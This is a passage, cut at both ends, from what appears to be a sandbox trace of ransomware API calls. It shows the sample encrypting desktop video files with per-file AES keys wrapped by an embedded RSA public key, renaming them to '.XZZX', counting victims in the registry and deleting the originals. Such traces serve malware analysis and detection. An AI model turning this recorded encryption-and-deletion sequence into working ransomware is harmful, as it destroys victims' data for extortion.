-----END PUBLIC KEY-----" [0165.396] lstrcpyW (in: lpString1=0x2aaf460, lpString2="NvEcGQE86DZ.flv" | out: lpString1="NvEcGQE86DZ.flv") returned="NvEcGQE86DZ.flv" [0165.396] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0165.396] SetErrorMode (uMode=0x1) returned 0x1 [0165.396] lstrcpyW (in: lpString1=0x2aaf860, lpString2="NvEcGQE86DZ.flv" | out: lpString1="NvEcGQE86DZ.flv") returned="NvEcGQE86DZ.flv" [0165.396] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x2376220c, Data2=0xe760, Data3=0x4c6f, Data4=([0]=0xa6, [1]=0x9, [2]=0xdb, [3]=0x56, [4]=0xcc, [5]=0x29, [6]=0xca, [7]=0x92))) returned 0x0 [0165.396] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NvEcGQE86DZ.flv") returned 57 [0165.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0165.396] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E50598804514D2A02376220C47BFB6E8.XZZX") returned 79 [0165.396] StrStrW (lpFirst="NvEcGQE86DZ.flv", lpSrch="XZZX") returned 0x0 [0165.396] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NvEcGQE86DZ.flv", dwFileAttributes=0x20) returned 1 [0165.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NvEcGQE86DZ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nvecgqe86dz.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x970 [0165.398] ReadFile (in: hFile=0x970, lpBuffer=0x43e9670, nNumberOfBytesToRead=0xe676, lpNumberOfBytesRead=0x2aae418, lpOverlapped=0x0 | out: lpBuffer=0x43e9670*, lpNumberOfBytesRead=0x2aae418*=0xe676, lpOverlapped=0x0) returned 1 [0165.401] CloseHandle (hObject=0x970) returned 1 [0165.401] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1c60000 [0165.401] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1c70000 [0165.401] SetErrorMode (uMode=0x1) returned 0x1 [0165.401] lstrcpyW (in: lpString1=0x2aae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0165.401] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc1ed0) returned 1 [0165.404] CryptGenKey (in: hProv=0x3cc1ed0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x43727b8) returned 1 [0165.882] CryptExportKey (in: hKey=0x43727b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x2aae41c | out: pbData=0x0*, pdwDataLen=0x2aae41c*=0x94) returned 1 [0165.882] CryptExportKey (in: hKey=0x43727b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1c70000, pdwDataLen=0x2aae41c | out: pbData=0x1c70000*, pdwDataLen=0x2aae41c*=0x94) returned 1 [0165.882] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0165.882] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0165.882] CryptDestroyKey (hKey=0x43727b8) returned 1 [0165.882] CryptReleaseContext (hProv=0x3cc20f0, dwFlags=0x0) returned 0 [0165.882] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E50598804514D2A02376220C47BFB6E8.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\e50598804514d2a02376220c47bfb6e8.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x97c [0165.883] WriteFile (in: hFile=0x97c, lpBuffer=0x43e9670*, nNumberOfBytesToWrite=0xe676, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x43e9670*, lpNumberOfBytesWritten=0x2aae438*=0xe676, lpOverlapped=0x0) returned 1 [0165.884] SetFilePointer (in: hFile=0x97c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe676 [0165.884] WriteFile (in: hFile=0x97c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0165.884] SetFilePointer (in: hFile=0x97c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe67b [0165.884] WriteFile (in: hFile=0x97c, lpBuffer=0x2aaf860*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x2aaf860*, lpNumberOfBytesWritten=0x2aae438*=0x1e, lpOverlapped=0x0) returned 1 [0165.884] SetFilePointer (in: hFile=0x97c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe699 [0165.884] WriteFile (in: hFile=0x97c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0165.884] SetFilePointer (in: hFile=0x97c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe69e [0165.884] SetErrorMode (uMode=0x1) returned 0x1 [0165.884] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0165.884] OutputDebugStringW (lpOutputString="end") [0165.884] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----vÐ\x90Ê\x03`Õª\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x2aadbf4, pcbBinary=0x2aad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2aadbf4, pcbBinary=0x2aad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0165.884] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2aadbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2aad3dc, pcbStructInfo=0x2aad3d8 | out: pvStructInfo=0x2aad3dc, pcbStructInfo=0x2aad3d8) returned 1 [0165.884] CryptAcquireContextW (in: phProv=0x2aad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2aad3e4*=0x3cc2178) returned 1 [0165.885] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc2178, dwCertEncodingType=0x1, pInfo=0x437eba8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437ebd8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437ebe0*, PublicKey.cUnusedBits=0x0), phKey=0x2aad3ec | out: phKey=0x2aad3ec*=0x43727b8) returned 1 [0165.885] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0165.885] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0165.885] CryptEncrypt (in: hKey=0x43727b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2aad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x2aad3f0*=0x80) returned 1 [0165.885] CryptEncrypt (in: hKey=0x43727b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc2200*, pdwDataLen=0x2aad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc2200*, pdwDataLen=0x2aad3e8*=0x80) returned 1 [0165.885] WriteFile (in: hFile=0x97c, lpBuffer=0x3cc2200*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x3cc2200*, lpNumberOfBytesWritten=0x2aae438*=0x80, lpOverlapped=0x0) returned 1 [0165.885] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0165.885] WriteFile (in: hFile=0x97c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0165.886] GetUserNameW (in: lpBuffer=0x2aae1f8, pcbBuffer=0x2aadfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x2aadfe0) returned 1 [0165.886] wsprintfW (in: param_1=0x2aadff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0165.886] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2aadfe4 | out: phkResult=0x2aadfe4*=0x988) returned 0x0 [0165.886] RegQueryValueExW (in: hKey=0x988, lpValueName="E1010314", lpReserved=0x0, lpType=0x2aadfd8, lpData=0x2aadfec, lpcbData=0x2aadfdc*=0x4 | out: lpType=0x2aadfd8*=0x4, lpData=0x2aadfec*=0xe7, lpcbData=0x2aadfdc*=0x4) returned 0x0 [0165.886] RegCloseKey (hKey=0x988) returned 0x0 [0165.886] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2aadfe8 | out: phkResult=0x2aadfe8*=0x988) returned 0x0 [0165.886] RegSetValueExW (in: hKey=0x988, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x2aadfec*=0xe8, cbData=0x4 | out: lpData=0x2aadfec*=0xe8) returned 0x0 [0165.886] RegCloseKey (hKey=0x988) returned 0x0 [0165.886] VirtualFree (lpAddress=0x1c60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0165.886] VirtualFree (lpAddress=0x1c70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0165.887] CloseHandle (hObject=0x97c) returned 1 [0165.887] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0165.887] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0165.887] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NvEcGQE86DZ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nvecgqe86dz.flv")) returned 1 [0165.888] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NvEcGQE86DZ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nvecgqe86dz.flv")) returned 0 Thread: id = 557 os_tid = 0xa40 [0165.616] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0165.616] lstrcpyW (in: lpString1=0x2caf460, lpString2="oNjA8Krckm-Uh1s9B5p.mkv" | out: lpString1="oNjA8Krckm-Uh1s9B5p.mkv") returned="oNjA8Krckm-Uh1s9B5p.mkv" [0165.616] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0165.616] SetErrorMode (uMode=0x1) returned 0x1 [0165.616] lstrcpyW (in: lpString1=0x2caf860, lpString2="oNjA8Krckm-Uh1s9B5p.mkv" | out: lpString1="oNjA8Krckm-Uh1s9B5p.mkv") returned="oNjA8Krckm-Uh1s9B5p.mkv" [0165.616] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x429f9f1c, Data2=0x9013, Data3=0x481f, Data4=([0]=0x9c, [1]=0xdc, [2]=0x56, [3]=0x65, [4]=0x80, [5]=0x59, [6]=0xb5, [7]=0x80))) returned 0x0 [0165.616] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oNjA8Krckm-Uh1s9B5p.mkv") returned 65 [0165.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0165.616] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BB588F142896CA4D429F9F1C2B61AE95.XZZX") returned 79 [0165.616] StrStrW (lpFirst="oNjA8Krckm-Uh1s9B5p.mkv", lpSrch="XZZX") returned 0x0 [0165.616] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oNjA8Krckm-Uh1s9B5p.mkv", dwFileAttributes=0x20) returned 1 [0165.617] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oNjA8Krckm-Uh1s9B5p.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\onja8krckm-uh1s9b5p.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x96c [0165.617] ReadFile (in: hFile=0x96c, lpBuffer=0x3ba1a8, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x2cae418, lpOverlapped=0x0 | out: lpBuffer=0x3ba1a8*, lpNumberOfBytesRead=0x2cae418*=0xbb0, lpOverlapped=0x0) returned 1 [0165.618] CloseHandle (hObject=0x96c) returned 1 [0165.618] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1c80000 [0165.619] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1c90000 [0165.619] SetErrorMode (uMode=0x1) returned 0x1 [0165.619] lstrcpyW (in: lpString1=0x2cae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0165.619] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc2068) returned 1 [0165.622] CryptGenKey (in: hProv=0x3cc2068, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x4372838) returned 1 [0165.894] CryptExportKey (in: hKey=0x4372838, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x2cae41c | out: pbData=0x0*, pdwDataLen=0x2cae41c*=0x94) returned 1 [0165.894] CryptExportKey (in: hKey=0x4372838, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1c90000, pdwDataLen=0x2cae41c | out: pbData=0x1c90000*, pdwDataLen=0x2cae41c*=0x94) returned 1 [0165.894] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0165.894] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0165.894] CryptDestroyKey (hKey=0x4372838) returned 1 [0165.894] CryptReleaseContext (hProv=0x3cc20f0, dwFlags=0x0) returned 0 [0165.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BB588F142896CA4D429F9F1C2B61AE95.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bb588f142896ca4d429f9f1c2b61ae95.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x968 [0165.895] WriteFile (in: hFile=0x968, lpBuffer=0x3ba1a8*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x2cae438, lpOverlapped=0x0 | out: lpBuffer=0x3ba1a8*, lpNumberOfBytesWritten=0x2cae438*=0xbb0, lpOverlapped=0x0) returned 1 [0165.895] SetFilePointer (in: hFile=0x968, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbb0 [0165.895] WriteFile (in: hFile=0x968, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2cae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2cae438*=0x5, lpOverlapped=0x0) returned 1 [0165.895] SetFilePointer (in: hFile=0x968, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbb5 [0165.895] WriteFile (in: hFile=0x968, lpBuffer=0x2caf860*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x2cae438, lpOverlapped=0x0 | out: lpBuffer=0x2caf860*, lpNumberOfBytesWritten=0x2cae438*=0x2e, lpOverlapped=0x0) returned 1 [0165.895] SetFilePointer (in: hFile=0x968, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbe3 [0165.895] WriteFile (in: hFile=0x968, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2cae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2cae438*=0x5, lpOverlapped=0x0) returned 1 [0165.895] SetFilePointer (in: hFile=0x968, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbe8 [0165.896] SetErrorMode (uMode=0x1) returned 0x1 [0165.896] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0165.896] OutputDebugStringW (lpOutputString="end") [0165.896] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----vX\x8aÊ\x03`ÕÊ\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x2cadbf4, pcbBinary=0x2cad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2cadbf4, pcbBinary=0x2cad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0165.896] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2cadbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2cad3dc, pcbStructInfo=0x2cad3d8 | out: pvStructInfo=0x2cad3dc, pcbStructInfo=0x2cad3d8) returned 1 [0165.896] CryptAcquireContextW (in: phProv=0x2cad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2cad3e4*=0x3cc2288) returned 1 [0165.896] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc2288, dwCertEncodingType=0x1, pInfo=0x3cf2620*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf2650*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf2658*, PublicKey.cUnusedBits=0x0), phKey=0x2cad3ec | out: phKey=0x2cad3ec*=0x4372838) returned 1 [0165.896] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0165.897] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0165.897] CryptEncrypt (in: hKey=0x4372838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2cad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x2cad3f0*=0x80) returned 1 [0165.897] CryptEncrypt (in: hKey=0x4372838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc2310*, pdwDataLen=0x2cad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc2310*, pdwDataLen=0x2cad3e8*=0x80) returned 1 [0165.897] WriteFile (in: hFile=0x968, lpBuffer=0x3cc2310*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2cae438, lpOverlapped=0x0 | out: lpBuffer=0x3cc2310*, lpNumberOfBytesWritten=0x2cae438*=0x80, lpOverlapped=0x0) returned 1 [0165.897] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0165.897] WriteFile (in: hFile=0x968, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2cae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2cae438*=0x5, lpOverlapped=0x0) returned 1 [0165.897] GetUserNameW (in: lpBuffer=0x2cae1f8, pcbBuffer=0x2cadfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x2cadfe0) returned 1 [0165.897] wsprintfW (in: param_1=0x2cadff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0165.897] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2cadfe4 | out: phkResult=0x2cadfe4*=0x974) returned 0x0 [0165.897] RegQueryValueExW (in: hKey=0x974, lpValueName="E1010314", lpReserved=0x0, lpType=0x2cadfd8, lpData=0x2cadfec, lpcbData=0x2cadfdc*=0x4 | out: lpType=0x2cadfd8*=0x4, lpData=0x2cadfec*=0xe8, lpcbData=0x2cadfdc*=0x4) returned 0x0 [0165.897] RegCloseKey (hKey=0x974) returned 0x0 [0165.897] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2cadfe8 | out: phkResult=0x2cadfe8*=0x974) returned 0x0 [0165.897] RegSetValueExW (in: hKey=0x974, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x2cadfec*=0xe9, cbData=0x4 | out: lpData=0x2cadfec*=0xe9) returned 0x0 [0165.897] RegCloseKey (hKey=0x974) returned 0x0 [0165.897] VirtualFree (lpAddress=0x1c80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0165.898] VirtualFree (lpAddress=0x1c90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0165.898] CloseHandle (hObject=0x968) returned 1 [0165.898] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0165.898] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0165.898] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oNjA8Krckm-Uh1s9B5p.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\onja8krckm-uh1s9b5p.mkv")) returned 1 [0165.899] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oNjA8Krckm-Uh1s9B5p.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\onja8krckm-uh1s9b5p.mkv")) returned 0 Thread: id = 558 os_tid = 0xb0c [0165.834] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC 